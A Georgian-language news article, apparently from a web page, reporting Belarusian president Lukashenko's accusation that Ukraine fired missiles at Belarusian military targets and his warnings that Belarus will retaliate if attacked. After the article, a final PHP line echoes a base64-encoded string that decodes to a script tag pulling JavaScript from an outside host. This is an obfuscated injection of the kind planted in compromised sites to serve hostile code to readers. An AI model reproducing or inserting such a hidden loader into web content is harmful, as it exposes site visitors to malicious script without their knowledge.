celsiusi
ავერსი საქკაბელი
ბელარუსის პრეზიდენტი ალექსანდრ ლუკაშენკო უკრაინას ბელარუსის მიმართულებით რაკეტების სროლაში ადანაშაულებს.
 
უკრაინული მედიის ცნობით, ბელარუსის პრეზიდენტმა ამის შესახებ ქვეყნის დამოუკიდებლობის დღისადმი მიძღვნილ საღამოზე განაცხადა.
 
„ჩვენს პროვოცირებას ცდილობენ. უნდა მოგახსენოთ, სამი დღის წინ, შესაძლოა, ცოტა მეტი დღის წინ, უკრაინის ტერიტორიიდან სცადეს, დარტყმა განეხორციელებინათ ბელარუსის ტერიტორიაზე არსებულ სამხედრო ობიექტებზე. მაგრამ, მადლობა ღმერთს, „პანცირის“ საზენიტო სისტემებმა მოახერხა უკრაინის შეიარაღებული ძალების მიერ გაშვებული ყველა რაკეტის ჩამოგდება“, – განაცხადა ალექსანდრ ლუკაშენკომ.
 
ლუკაშენკოს თქმით, დაახლოებით ერთი თვის წინ გასცა ბრძანება, მიზანში ამოიღონ გადაწყვეტილების მიღების ცენტრები მინსკის ოპონენტების დედაქალაქებში. მისი განცხადებით, ბელარუსს არ სურს კონფლიქტში ჩართვა, თუმცა მისი პასუხი იქნება მყისიერი, თუ ვინმე ბელარუსის საზღვარს გადაკვეთს და ბელარუსი ხალხის დახოცვას დაიწყებს.
 
„ჩვენ ვფლობთ იმას, რითაც შევძლებთ პასუხის გაცემას და არა მხოლოდ ის, რაც ცოტა ხნის წინ განვიხილეთ რუსეთის პრეზიდენტთან. ამისთვის დიდი ხანია, ვემზადები. გახსოვთ, მე ვსაუბრობდი სარაკეტო წარმოებაზე, „პოლონეზებზე“ – თქვენ მთლიანად ამ რაკეტების თავდასხმის ქვეშ ხართ. არ დავუწყებ ყურებას, თუ ვინ არის ოფისებში და ვინ ზის სასახლეებში. ჩვენ ვუპასუხებთ მკაცრად და მტკიცედ. მათ, ვისაც აწუხებს კითხვა, იბრძოლებს თუ არა ლუკაშენკო, მინდა, ვუთხრა – მისმინეთ, ჩვენ ვიბრძოლებთ, კიდევ ერთხელ ვიმეორებ, მხოლოდ ერთ შემთხვევაში – თუ ჩვენს მიწაზე შემოიჭრებით, ჩვენს ხალხს დახოცავთ, ჩვენ გიპასუხებთ“, – განაცხადა ლუკაშენკომ.
650
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");